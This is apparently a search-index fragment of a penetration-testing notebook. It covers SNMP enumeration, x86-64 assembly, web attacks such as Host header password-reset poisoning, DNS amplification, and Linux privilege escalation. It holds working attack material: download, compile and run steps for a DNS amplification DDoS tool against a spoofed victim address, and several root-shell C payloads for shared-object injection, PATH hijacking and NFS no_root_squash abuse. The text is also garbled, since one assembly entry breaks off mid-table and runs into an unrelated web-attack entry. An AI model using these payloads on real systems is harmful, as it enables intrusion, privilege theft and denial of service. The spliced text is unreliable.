Its syntax is mostly the same as snmp-check:","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » SNMP Enumeration using snmpwalk","id":"33","title":"SNMP Enumeration using snmpwalk"},"330":{"body":"In register mode addressing, the operand is a register ( brain undergoing nuclear-fission ). mov rax, rbx The value inside rbx is copied to rax.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Register Mode Addressing","id":"330","title":"Register Mode Addressing"},"331":{"body":"In immediate mode addressing, the operand is an immediate value, or a literal . These are simply constant values such as 10, 0xfa3, \"lol\", and so on. mov rax, 123 The number 123 is copied into rax.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Immediate Mode Addressing","id":"331","title":"Immediate Mode Addressing"},"332":{"body":"In memory mode addressing, the operand is treated as a memory location. This is referred to as indirection or dereferencing and is similar to how pointers can be dereferenced in C/C++. In assembly, this is done by wrapping the operand in square brackets: []. So for example, rax refers to the value stored within the register rax. However, [rax] means \"treat rax like a pointer and use the value it points to\". Essentially, [rax] treats the value inside the register as an address and uses that address to find the actual value it needs. mov DWORD PTR [rax], 0xdeadbeef The value 0xdeadbeef is copied into the location pointed to by rax. Since memory is byte-addressable, it is oftentimes required to specify how many bytes we want to access. This is done by prepending one of the following specifiers to the operand: Specifier Number of Bytes BYTE PTR / byte 1 WORD PTR / word 2 DWORD PTR / dword 4 QWORD PTR / qword 8 Moreover, the actual formula for memory addressing is a bit more complicated, since it was developed mainly for making the implementation of arrays easier. 
[baseAddr + (indexReg * scaleValue) + offset] The baseAddr must be a register or variable name, although it may be omitted in which case the address is relative to the beginning of the data segment. indexReg is a register which contains an index into the array and the scaleValue is the size (in bytes) of a single member of the array. The offset must be an immediate value. mov eax, dword [ebx] ; move into eax the value which ebx points to\nmov rax, QWORD PTR [rbx + rsi] ; move into rax the value which (rbx + rsi) points to\nmov rcx, qword [rax+(rsi*8)] ; move into rcx the value which (rax + (rsi*8)) points to","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Memory Mode Addressing","id":"332","title":"Memory Mode Addressing"},"333":{"body":"Memory is nothing more than a series of bytes which can be individually addressed. When storing values which are larger than a single byte, the bytes under the x86-64 paradigm are stored in little-endian order - the least significant byte (LSB) at the lowest memory address and the most significant byte (MSB) at the highest memory address. For example, the variable var = 0xDEADBEEF would be represented in memory as follows: Note how the right-most byte is at a lower address and the addresses for the rest of the bytes increase as we go right-to-left.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Memory » Endianness","id":"333","title":"Endianness"},"334":{"body":"Below is the general memory layout of a programme: The reserved section is unavailable to user programmes. The .text section stores the instructions which comprise the programme's code. Static variables which were declared and given a value at assemble-time are stored in the .data section. The .bss section stores static uninitialised data, i.e. variables which were declared but were not provided with an initial value. 
If such variables are used before they are initialised, their value will be meaningless. The Stack and the Heap are where data can be allocated at run-time. The Stack is used for allocating space for small amounts of data with a size known at compile-time and grows from higher to lower addresses. Conversely, the Heap allows for the dynamic allocation of space for data of size known at run-time and grows from lower to higher addresses.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Memory » Memory Layout","id":"334","title":"Memory Layout"},"335":{"body":"Registers are value containers which reside on the CPU (separately from RAM). They are small in size and some have special purposes. x86-64 assembly operates with 16 general-purpose registers (GPRs). It should be noted that the 8-byte (r) variants do not exist in 32-bit mode. 64-bit Register Lower 4 Bytes Lower 2 Bytes Lower 1 Byte rbp ebp bp bpl rsp esp sp spl rip eip rax eax ax al rbx ebx bx bl rcx ecx cx cl rdx edx dx dl rsi esi si sil rdi edi di dil r8 r8d r8w r8b r9 r9d r9w r9b r10 r10d r10w r10b r11 r11d r11w r11b r12 r12d r12w r12b r13 r13d r13w r13b r14 r14d r14w r14b r15 r15d r15w r15b Each row contains names which refer to different parts of the same register. Note, the lower 16 bits of the rip register (instruction pointer) are inaccessible on their own. For example, the rax register could be set to the following: rax = 0x0000 000AB 10CA 07F0 The name eax would then only refer to the part of the rax register which contains 10CA 07F0. Similarly, ax would represent 07F0, and al would be just F0. Additionally, the upper byte of ax, bx, cx and dx may be separately accessed by means of the ah, bh, ch and dh monikers, which exist for legacy reasons.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » Introduction","id":"335","title":"Introduction"},"336":{"body":"Not all registers available in the x86-64 paradigm are created equal. 
Certain registers are reserved for specific purposes, despite being called general-purpose.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » Register Specialisation","id":"336","title":"Register Specialisation"},"337":{"body":"The stack pointer rsp (esp for 32-bit machines) is used to point to the current top of the stack and should not be used for any purpose other than instructions which involve stack manipulation.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Stack Pointer rsp","id":"337","title":"The Stack Pointer rsp"},"338":{"body":"The base pointer rbp (ebp for 32-bit machines) is the twin brother of the stack pointer and is used as a base pointer when calling functions. It points to the beginning of the current function's stack frame. Interestingly enough, its use is actually gratuitous because compilers can manage the stack frames of functions equally well without a separate base pointer. It is mostly used to make assembly code more comprehensible for humans.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Base Pointer rbp","id":"338","title":"The Base Pointer rbp"},"339":{"body":"The instruction pointer rip (eip for 32-bit machines) points to the next instruction to be executed. It is paramount not to get confused when using a debugger, since the rip does not actually point to the instruction currently being executed.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Instruction Pointer rip","id":"339","title":"The Instruction Pointer rip"},"34":{"body":"Notwithstanding its age, onesixtyone is a good tool which allows you to bruteforce community strings by specifying a file instead of a single string with its -c option. 
Its syntax is rather simple:","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » Bruteforce community strings with onesixtyone","id":"34","title":"Bruteforce community strings with onesixtyone"},"340":{"body":"The flag register rFlags (eFlags for 32-bit machines) is an isolated register which is automatically updated by the CPU after every instruction and is not directly accessible by programmes. Following is a table of the meaning assigned to different bits of this register. Note that only the lower 32 bits are used even on 64-bit machines. Name Symbol Bit Usage =1 =0 Carry CF 0 Indicates whether the previous operation resulted in a carry-over. CY (Carry) CN (No Carry) 1 Reserved. Always set to 1 for eFlags. Parity PF 2 Indicates whether the least significant byte of the previous instruction's result has an even number of 1's. PE (Parity Even) PO (Parity Odd) 3 Reserved. Auxiliary Carry AF 4 Used to support binary-coded decimal operations. AC (Auxiliary Carry) NA (No Auxiliary Carry) 5 Reserved. Zero ZF 6 Indicates whether the previous operation resulted in a zero. ZR (Zero) NZ (Not Zero) Sign SF 7 Indicates whether the most significant bit was set to 1 in the previous operation (implies a negative result in signed-data contexts). NG (Negative) PL (Positive) Trap TF 8 Used by debuggers when single-stepping through a programme. Interrupt Enable IF 9 Indicates whether or not the CPU should immediately respond to maskable hardware interrupts. EI (Enable Interrupt) DI (Disable Interrupt) Direction DF 10 Indicates the direction in which several bytes of data should be copied from one location to another. DN (Down) UP (Up) Overflow OF 11 Indicates whether the previous operation resulted in an integer overflow. 
OV (Overflow) NV (No Overflow) I/O Privilege Level IOPL 12-13 Nested Task NT 14 Mode MD 15 Resume RF 16 Virtual 8086 Mode VM 17 31-63 Reserved.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Flag Register rFlags","id":"340","title":"The Flag Register rFlags"},"341":{"body":"In addition to the aforementioned registers, the x86-64 paradigm includes 16 registers, xmm[0-15], which are used for 32- and 64-bit floating-point operations. Furthermore, the same registers are used to support the Streaming SIMD Extensions (SSE) which allow for the execution of Single Instruction Multiple Data (SIMD) instructions.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » Floating-Point Registers and SSE","id":"341","title":"Floating-Point Registers and SSE"},"342":{"body":"The x86-64 assembly paradigm has quite a lot of different instructions available at its disposal. An instruction consists of an operation and a set of operands where the latter specify the data and the former specifies what is to be done to that data.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Instruction Set » Introduction","id":"342","title":"Introduction"},"343":{"body":"Typically, instruction signatures are represented using the following operand notation. Operand Notation Description Register operand. , , , Register operand with a specific size requirement. Source operand. Destination operand - this may be a register or memory location. Floating-point destination register operand. Immediate value (a literal). Base-10 by default, but can be preceded with 0x to make it hexadecimal. Memory location - a variable name or an address. Arbitrary operand - immediate value, register or memory location. .'\">View Me! Here, a new URL is generated based on the value of a parameter $val. Suppose the attacker passes the value 123%26action=edit onto the parameter. The URL-encoded value for & is %26. 
When this gets to the htmlspecialchars function, the %26 gets converted to an &. When the URL gets formed, it becomes And since this is viewed as HTML, an additional parameter has been smuggled! The link would be equivalent to /page.php?action=view&par=123&action=edit This second action parameter could cause unexpected behaviour based on how the server handles duplicate parameters.","breadcrumbs":"Exploitation » Web » HTTP Parameter Pollution » Client-Side HPP","id":"147","title":"Client-Side HPP"},"148":{"body":"The HTTP Host header is a mandatory header for HTTP requests and specifies the domain name which the client wants to access. This is especially handy with virtual hosting because a single IP address may provide different services on different domains and the server needs to know which page to return to the client. For example, the same machine may serve a blog website at blog.example.com and a git repository at dev.example.com. In order to specify which of the two services the client wants to access, they must specify either the header Host: blog.example.com or Host: dev.example.com, respectively, in their request. A host header injection vulnerability arises when the target application unsafely uses the contents of the Host header, typically in order to construct an absolute URL.","breadcrumbs":"Exploitation » Web » Host Header Injection » Introduction","id":"148","title":"Introduction"},"149":{"body":"This technique involves using Host Header Injection in order to force a vulnerable application to generate a password reset link which points to a malicious domain. This may be leveraged to steal the secret tokens required to reset the passwords of arbitrary users and consequently compromise their accounts. Typically applications implement password resetting as follows. The user specifies their username/email. The server generates a temporary, unique, high-entropy token for the user. 
The server generates a URL for the password reset with the secret token included as a URL parameter. For example, example.com/reset?token=abcdefghijklmnopqrstuvwxyz The server sends an email to the client which includes the generated password reset link. When the user clicks the link in their email, the token in the URL is used by the server in order to determine whose password is being reset and whether or not it is a valid request. If the Host header of the request for a password reset is used in generating the password reset URL, an adversary may leverage it in order to steal the token for an arbitrary user. For example, an adversary could submit a password reset request for a user, e.g. carlos, intercept the request and modify the Host header to point to a domain controlled by them: Host: exploit-server.com. When the server generates the password reset URL, it will resemble the following, http://exploit-server.com/reset?token=abcdefghijklmnopqrstuvwxyz. If the victim clicks on the link, their token will be handed over to the attacker by means of the exploit-server.com domain which receives the password reset request. This type of attack, however, does not always require user interaction because emails are typically scanned, be it to determine whether they are spam or whether they contain a virus, and the scanners will oftentimes open the links themselves, all automatically, thus giving the attacker the token to reset the password.","breadcrumbs":"Exploitation » Web » Host Header Injection » Password Reset Poisoning","id":"149","title":"Password Reset Poisoning"},"15":{"body":"This is the process of discovering active hosts on a network, either for attacking them or assessing the overall network security.","breadcrumbs":"Reconnaissance » Enumeration » Network Scanning","id":"15","title":"Network Scanning"},"150":{"body":"Check to see if absolute URLs are necessary and cannot be replaced with relative ones. 
If an absolute URL is necessary, ensure that the current domain is stored in a configuration file and do NOT use the one from the Host: header. If using the Host header is inevitable, ensure that it is validated against a whitelist of permitted domains. Different frameworks may provide different methods for achieving this. Drop support for additional headers which may permit such attacks, such as the X-Forwarded-Host header. Do NOT virtual-host internal-only websites on a server which also provides public-facing content, since those may be accessed via manipulation of the Host header.","breadcrumbs":"Exploitation » Web » Host Header Injection » Prevention","id":"150","title":"Prevention"},"151":{"body":"","breadcrumbs":"Exploitation » Windows » Windows","id":"151","title":"Windows"},"152":{"body":"Shell Command Files (SCF) permit a limited set of operations and are executed upon browsing to the location where they are stored. What makes them interesting is the fact that they can communicate through SMB, which means that it is possible to extract NTLM hashes from Windows hosts. This can be achieved if you are provided with write access to an SMB share.","breadcrumbs":"Exploitation » Windows » SCF File Attacks » Introduction","id":"152","title":"Introduction"},"153":{"body":"You will first need to create a malicious .scf file where you are going to write a simple (you can scarcely even call it that) script.","breadcrumbs":"Exploitation » Windows » SCF File Attacks » The Attack","id":"153","title":"The Attack"},"154":{"body":"","breadcrumbs":"Exploitation » DNS » DNS","id":"154","title":"DNS"},"155":{"body":"A DNS (Traffic) Amplification attack is a popular form of a distributed denial of service (DDoS) attack, which abuses open DNS resolvers to flood a target system with DNS response traffic. 
It's called an amplification attack because it uses DNS responses to upscale the size of the data sent to the victim.","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » What is DNS Traffic Amplification?","id":"155","title":"What is DNS Traffic Amplification?"},"156":{"body":"An attacker sends a DNS name lookup to an open resolver with the source IP spoofed to be the victim's IP address. That way, any response traffic would be sent to the victim and not the attacker. The requests submitted by the attacker usually aim to query for as much information as possible in order to maximise the amplification effect. In most cases, the queries sent are of type ANY which requests all known information about a particular DNS zone. Using a botnet, it's easy to create immense amounts of traffic. It is also rather difficult to protect against these attacks because the traffic is coming from legitimate sources - real DNS servers.","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » How does it work?","id":"156","title":"How does it work?"},"157":{"body":"","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » Conducting a DNS Traffic Amplification Attack","id":"157","title":"Conducting a DNS Traffic Amplification Attack"},"158":{"body":"We should first check if a DNS Traffic Amplification is possible and if it's viable. We can do this through Metasploit using the module auxiliary/scanner/dns/dns_amp. In the RHOSTS you need to put the IP of the name server you want to test. This module will tell you if a name server can be used in an amplification attack but won't actually execute the attack. Run the scanner:","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » Testing a DNS server for attack surface","id":"158","title":"Testing a DNS server for attack surface"},"159":{"body":"A simple tool is available only as a proof of concept here . 
You will need to download and then compile it: wget https://raw.githubusercontent.com/rodarima/lsi/master/entrega/p2/dnsdrdos.c gcc -o dnsdrdos dnsdrdos.c -Wall -ansi ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ wget https://raw.githubusercontent.com/rodarima/lsi/master/entrega/p2/dnsdrdos.c\n--2021-09-21 13:01:11-- https://raw.githubusercontent.com/rodarima/lsi/master/entrega/p2/dnsdrdos.c\nResolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.111.133, 185.199.110.133, ...\nConnecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 15109 (15K) [text/plain]\nSaving to: ‘dnsdrdos.c’ dnsdrdos.c 100%[========================================================================================================================================>] 14.75K --.-KB/s in 0.001s 2021-09-21 13:01:11 (17.9 MB/s) - ‘dnsdrdos.c’ saved [15109/15109] ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ gcc -o dnsdrdos dnsdrdos.c -Wall -ansi Now, create a file containing the IP's of each DNS server you want to use in the attack (only one IP per line). Use the following syntax to run the attack: sudo ./dnsdrdos -f -s -d -l ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ sudo ./dnsdrdos -f dns_servers -s 192.168.129.2 -d nsa.gov -l 30\n----------------------------------------------- dnsdrdos - by noptrix - http://www.noptrix.net/ ----------------------------------------------- ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ The output may be empty, but the packets were sent. You can verify this with wireshark:","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » Executing the attack","id":"159","title":"Executing the attack"},"16":{"body":"Reveals the presence of known vulnerabilities. It checks whether a system is exploitable through a set of weaknesses. Such a scanner consists of a catalog and a scanning engine. 
The catalog contains information about known vulnerabilities and exploits for them that work on a multitude of servers. The scanning engine is responsible for the logic behind the exploitation and analysis of the results.","breadcrumbs":"Reconnaissance » Enumeration » Vulnerability Scanning","id":"16","title":"Vulnerability Scanning"},"160":{"body":"A flaw of all DNS name servers is that if they contain incorrect information, they may spread it to clients or other name servers. Each DNS name server (even individual clients) has a DNS cache. The system stores there information about any responses it gets for domains it requested. An attacker could inject false entries in this cache and as such, any computer which queries the poisoned name server will receive false results. This is known as DNS cache poisoning . The attack can be used to redirect users to a different website than the requested one. As such, it opens opportunities for phishing attacks by creating evil twins of login portals for well-known sites. A tool for performing such targeted attacks is deserter . Usage information is available on its GitHub page.","breadcrumbs":"Exploitation » DNS » DNS Cache Poisoning » Introduction","id":"160","title":"Introduction"},"161":{"body":"","breadcrumbs":"Post Exploitation » Post Exploitation","id":"161","title":"Post Exploitation"},"162":{"body":"","breadcrumbs":"Post Exploitation » Privilege Escalation » Introduction","id":"162","title":"Introduction"},"163":{"body":"The first thing you need to do after gaining a foothold on a machine is to look for reused credentials. You should try every password you have gathered on all users, you never know when you might find an easy escalation to root. Next, you should hunt down sensitive files and look for stored credentials in configuration and source files of different applications. Naturally, you should also enumerate any local databases you find. Additionally, SSH keys are something to be on the lookout for. 
You should also go through the bash history and look for any passwords which were passed as command-line arguments. You should then move on to looking for exploits. Kernel exploits are really low-hanging fruit, so you should always check the kernel version. Subsequently, proceed by enumerating sudo and the different ways to exploit it, for example via Shell Escape Sequences or LD_PRELOAD . Next, track down any misconfigurations such as excessive capabilities or SUID Binaries . You should check if you have write access to any sensitive files such as /etc/passwd or /etc/shadow, as well as any cron jobs or cron job dependencies. Finally, you should move on to enumerating running software and services which are executed as root and try to find vulnerabilities in them which may allow for privilege escalation. This can all be summed up into the following: Credentials Reused Credentials Credentials in Configuration or Source Files Credentials from Databases Credentials in Sensitive Files Credentials from Bash History SSH Keys Exploitation Kernel Exploits Sudo Misconfigurations Excessive Capabilities SUID/SGID Binaries Write Access to Sensitive Files Writable Cron Jobs and Cron Job Dependencies Installed Software Vulnerabilities in Software and Services Running as Root","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Methodology","id":"163","title":"Methodology"},"164":{"body":"The Set Owner User ID (SUID) and Set Group ID (SGID) are special permissions which can be attributed to Linux files and folders. Any files which are owned by root and have SUID set will be executed with elevated privileges. Our goal is to hunt down those files and abuse them in order to escalate our privileges. 
This can be easily done with the following command: find / -perm -u=s -type f -user root 2>/dev/null","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Introduction","id":"164","title":"Introduction"},"165":{"body":"You should diligently inspect the list of files returned. Some standard Linux binaries may allow for privilege escalation if they have the SUID bit set for one reason or another. It is useful to go through these binaries and check them on GTFOBins . In the above example, we find that /bin/systemctl has the SUID bit set and that it also has an entry in GTFOBins : By following the instructions, although with slight modifications, we can run commands with elevated privileges:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Exploiting Misconfigured Common Binaries","id":"165","title":"Exploiting Misconfigured Common Binaries"},"166":{"body":"Some binaries may be vulnerable to Shared Object (SO) Injection. This typically stems from misconfigurations where the binary looks for a specific library in a specific directory, but can't actually find it. If we have write access to this directory, we can hijack the search for the library by compiling our own malicious library in the place where the original one was supposed to be. This is quite similar to escalating via LD_PRELOAD , but it is a bit more difficult to find and exploit. You will first need to identify an SUID binary which has misconfigured shared libraries. A lot of the times the binary will refuse to run, saying that it is missing a particular library, however, this is not always the case: It is always good practice to run the programme with strace, which will print any attempts of the binary to access libraries: strace 2>&1 | grep -iE \"open|access\" What stands out in particular is the /home/user/.config/libcalc.so library, since /home/user/.config/ may be a writable directory. 
It turns out that the directory doesn't even exist, however, we can write to /home/user/ which means that we can create it. What now remains is to compile a malicious library into libcalc.so. #include \n#include static void inject() __attribute__((constructor)); void inject()\n{ setuid(0); setgid(0); system(\"/bin/bash -i\");\n} For older versions of GCC, you may need to use the _init() function syntax: #include \n#include void _init()\n{ setuid(0); setgid(0); system(\"/bin/bash -i\");\n} Compile the malicious library: gcc -shared -fPIC -o libcalc.so libcalc.c # add -nostartfiles if using _init()","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Privilege Escalation via Shared Object Injection","id":"166","title":"Privilege Escalation via Shared Object Injection"},"167":{"body":"Path Hijacking refers to the deliberate manipulation of environmental variables, most commonly \\$PATH, such that the invocations of programmes in a binary actually refer to malicious binaries and not the intended ones. This vector requires more sophisticated digging into the internals of an SUID binary, specifically tracking down the different invocations the binary performs. This can commonly be achieved by running strings on the binary, but you will probably have to resort to more serious reverse engineering, as well. Specifically, you want to be on the lookout for shell commands which get executed by the SUID binary.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Privilege Escalation via Path Hijacking","id":"167","title":"Privilege Escalation via Path Hijacking"},"168":{"body":"Relative paths are comparably easy to hijack - they require little other than editing the \\$PATH variable. 
Once you have identified a shell command within an SUID binary which invokes another programme via a relative path, you can just prepend to the \\$PATH a directory which will contain an executable with the same name as the one originally invoked. Let's compile our own malicious binary; the setuid(0) call is needed because bash drops its effective privileges back to the real UID unless run with -p. #include <stdlib.h>\n#include <unistd.h> int main()\n{ setuid(0); setgid(0); system(\"/bin/bash -i\"); return 0;\n} gcc -o /tmp/service /tmp/service.c Afterwards, we need to prepend /tmp to the \\$PATH variable: export PATH=/tmp:\\$PATH And finally, run the original SUID binary:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Hijacking Relative Paths","id":"168","title":"Hijacking Relative Paths"},"169":{"body":"Absolute paths require a bit more work to be hijacked. Luckily, bash allows the creation of functions which have the forward slash (/) character in their name. This means that we can create a malicious bash function with the same name as the absolute path we want to hijack, and then our function will be invoked in lieu of the original programme. This only works when the SUID binary runs the command through bash (system() uses /bin/sh, so /bin/sh must be bash rather than dash, which does not import functions from the environment) and only on bash versions older than 4.2-048, which stopped importing exported functions whose names are not valid identifiers. First, create the bash function: function () { cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p; } Next, export the function: export -f Finally, run the original SUID binary:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Hijacking Absolute Paths","id":"169","title":"Hijacking Absolute Paths"},"17":{"body":"All services which need to interface with the network a host is connected to run on ports, and port scanning allows us to enumerate them in order to gather information such as what service is running, which version of the service is running, OS information, etc. Warning Port scanning is very heavy on network bandwidth and generates a lot of traffic which can cause the target to slow down or crash altogether. 
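The relative-path hijack above, shown end-to-end as an added example (not the page's own code). The SUID binary's system() call is simulated with sh -c so that the script runs unprivileged; plant_fake, victim_call and the fake service name are assumptions made for the demonstration:

```bash
#!/bin/sh
# Added example (not from the original page): emulate what happens inside the SUID
# binary when it calls system("service apache2 start") after we have prepended our
# directory to $PATH. Nothing here is SUID; only the lookup order is demonstrated.

# plant_fake DIR NAME: drop an executable NAME into DIR that announces it was run.
# On a real target this is the compiled setuid(0) binary from above, since a
# bash script would drop the inherited root privileges.
plant_fake() {
    printf '#!/bin/sh\necho HIJACKED:%s "$@"\n' "$2" > "$1/$2"
    chmod +x "$1/$2"
}

# victim_call DIR CMD: run CMD the way system() does (via sh -c) with DIR first
# in PATH, which is what `export PATH=DIR:$PATH` achieves for the real binary.
victim_call() {
    PATH="$1:$PATH" sh -c "$2" 2>/dev/null || true
}

demo() {
    dir=$(mktemp -d)
    plant_fake "$dir" service
    # Relative invocation: the fake wins because DIR is searched first.
    victim_call "$dir" 'service apache2 start'
    # Absolute invocation: PATH is never consulted, so nothing of ours runs.
    victim_call "$dir" '/nonexistent/sbin/service apache2 start'
    rm -rf "$dir"
}

demo
```

The second call is why the absolute-path case in the next section needs a different trick: no amount of PATH editing changes what `/usr/sbin/service` resolves to.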
During a penetration test, you should always inform the client when you are about to perform a port scan. Danger Port scanning without prior written permission from the target may be considered illegal in some jurisdictions. The de-facto standard port scanner is nmap , although alternatives such as masscan and RustScan do exist. Info A lot of nmap's techniques require elevated privileges, so it is advisable to always run the tool with sudo.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » Introduction","id":"17","title":"Introduction"},"170":{"body":"The kernel is the layer which sits between applications and the hardware. It runs with root privileges, so if it gets exploited, privileges can be escalated. Finding kernel vulnerabilities and writing exploits for them is no trifling task, however, once such a vulnerability is made public and exploit code for it is developed, it easily becomes a low-hanging fruit for escalating privileges. A very useful list of kernel exploits found to date is located here . Finding already existing exploits is really easy - just search for the Linux kernel version!","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Kernel Exploits » Introduction","id":"170","title":"Introduction"},"171":{"body":"As an example, we are going to exploit dirtyc0w. This was a very ubiquitous exploit and can still be found on numerous outdated machines. The exploit itself has many versions but for demonstration purposes we are going to use the one at https://www.exploit-db.com/exploits/40839 . We need to first verify that our kernel version is in the vulnerable range. 
Inside the exploit we see compilation instructions, which is typical of kernel exploits as they are usually written in C: By compiling and running the exploit (it may actually take some time to execute), we have elevated our privileges!","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Kernel Exploits » Exploiting the Kernel","id":"171","title":"Exploiting the Kernel"},"172":{"body":"It is common to see a low-privileged user to be configured to be able to run some commands via sudo without a password. Luckily, many existing programmes for Linux have advanced capabilities which allow them to do many things such as spawning a shell when run with sudo. If such a programme is configured in the aforementioned way, then there is a shell escape sequence which is a (usually) simple command/argument passed to the programme when run, so that it spawns a shell with elevated privileges when run with sudo. Naturally, these shell escape sequences are programme-specific and it would be inane to try and remember the sequence for every binary. This is where GTFOBins comes in. This is a database of commands (including shell escape sequences) for common Linux binaries which can be used for escalating privileges. We saw in the above list provided by sudo -l that we are allowed to run find as root via sudo. Let's check if there is a shell escape sequence for it. There is! We can copy and paste it, then run it with sudo, and we should at last have a root shell: Another example can be given with the awk binary, which we also saw in the list provided by sudo -l.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Sudo Shell Escape Sequences » Introduction","id":"172","title":"Introduction"},"173":{"body":"The compromised machine may be configured to allow certain directories to be mounted by other machines. 
You can enumerate such directories by running the following command on the victim machine: cat /etc/exports You can additionally verify this from your attacker machine by running: showmount -e If there is a mountable directory which is configured with no_root_squash, as is the case here, then it can be used for privilege escalation. By default (root_squash), the NFS server maps requests coming from UID 0 on a client to the anonymous user, so files created by a remote root end up owned by nobody; no_root_squash disables that mapping. We begin by mounting the target directory from the victim to a directory on our machine: sudo mount -o rw,vers=3 :/tmp /tmp/root_squash Now, if no_root_squash is configured for the mountable directory, then the root user on the attacker machine is trusted as root by the victim's NFS server. In essence, any file operation performed as root on the attacker machine (creating a file, chown, chmod) is recorded on the victim with UID 0; the victim does not execute anything for us, it merely trusts the UID the client reports. This allows us to create a malicious binary in the mounted directory and set its SUID bit from the attacker machine, which gives us a root-owned SUID binary on the target that is entirely under our control. Let's write a simple malicious C executable: #include <stdlib.h>\n#include <unistd.h> int main()\n{ setuid(0); // Set user ID to root setgid(0); // Set group ID to root system(\"/bin/bash -i\"); // Execute bash now with elevated privileges return 0;\n} It doesn't matter whether you create it on the target or the attacker machine, but you must either compile it on the target machine in order to avoid libc version mismatches, or build it statically on the attacker machine with gcc -static: gcc -o nfs_exploit nfs_exploit.c Next, you want to change the ownership of the compiled binary to root on the attacker machine. Afterwards, you want to set the SUID bit on the binary, once again, from the attacker machine: sudo chown root:root nfs_exploit\nsudo chmod +s nfs_exploit Finally, execute the malicious binary on the target. Note that this only works if the exported directory is not on a filesystem mounted with nosuid on the victim (systemd's tmpfs /tmp is, for example), since the kernel ignores SUID bits there:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » NFS Root Squashing » Introduction","id":"173","title":"Introduction"},"174":{"body":"Linux capabilities provide a way for splitting the privileges of root into small units. 
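An added example (not from the original page) that parses /etc/exports and flags the exports a remote root can abuse; the SAMPLE_EXPORTS content is constructed and dangerous_exports is my own helper name:

```bash
#!/bin/sh
# Added example (not from the original page): read /etc/exports and print every
# client entry that carries no_root_squash, marking world-exported and rw ones.

# Constructed sample of an /etc/exports file.
SAMPLE_EXPORTS='# /etc/exports: constructed sample
/tmp            *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/backup     10.0.0.0/24(rw,sync,no_root_squash) 192.168.1.0/24(ro)
/home           192.168.1.5(rw,sync,no_subtree_check)
/var/www        *(ro,all_squash)'

# dangerous_exports: stdin = exports file; prints "TAG RW PATH CLIENT" per
# client entry whose option list contains no_root_squash. TAG is WORLD when the
# export is open to every host (*), net otherwise.
dangerous_exports() {
    awk '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }   # skip comments and blanks
        {
            path = $1
            for (i = 2; i <= NF; i++) {            # one or more "client(options)" tokens
                client = $i; opts = ""
                if (match($i, /\(.*\)/)) {
                    client = substr($i, 1, RSTART - 1)
                    opts   = substr($i, RSTART + 1, RLENGTH - 2)
                }
                if (opts ~ /(^|,)no_root_squash(,|$)/) {
                    tag = (client == "*") ? "WORLD" : "net"
                    rw  = (opts ~ /(^|,)rw(,|$)/) ? "rw" : "ro"
                    printf "%s %s %s %s\n", tag, rw, path, client
                }
            }
        }'
    return 0
}

# Demo on the constructed sample. On a target: dangerous_exports < /etc/exports
printf '%s\n' "$SAMPLE_EXPORTS" | dangerous_exports
```

A "WORLD rw" line is the textbook case from the section above; a "net" line still works if your attacker box sits in the listed network. The read-only case is listed too, because no_root_squash on an ro export still lets you read root-only files through the mount.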
A binary with particular capabilities can perform certain tasks with elevated privileges without being SUID. If capabilities are not properly set, or if they are excessive, this may lead to privilege escalation. Binaries with capabilities may be found using the following command: getcap -r / 2>/dev/null A list of all possible capabilities can be found here . In the above example, we can see that the python interpreter has cap_setuid in its effective set, so it can arbitrarily set the user ID of the process. This means that we can change our user ID to 0 when running python, thus escalating our privileges:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing Linux Capabilities » Introduction","id":"174","title":"Introduction"},"175":{"body":"The LD_PRELOAD environment variable tells the dynamic linker to load the specified libraries before any others. By default, programmes run with sudo are executed in a clean, minimal environment; this is the env_reset default shown by sudo -l. However, env_keep may be used to inherit some environment variables from the calling process. If LD_PRELOAD is listed in env_keep, then we can compile our own malicious dynamic library and set LD_PRELOAD to it. Therefore, when we execute a binary with sudo, our library will be loaded before any other library and its initialisation function will be invoked with root permissions.","breadcrumbs":"Post Exploitation » Privilege Escalation 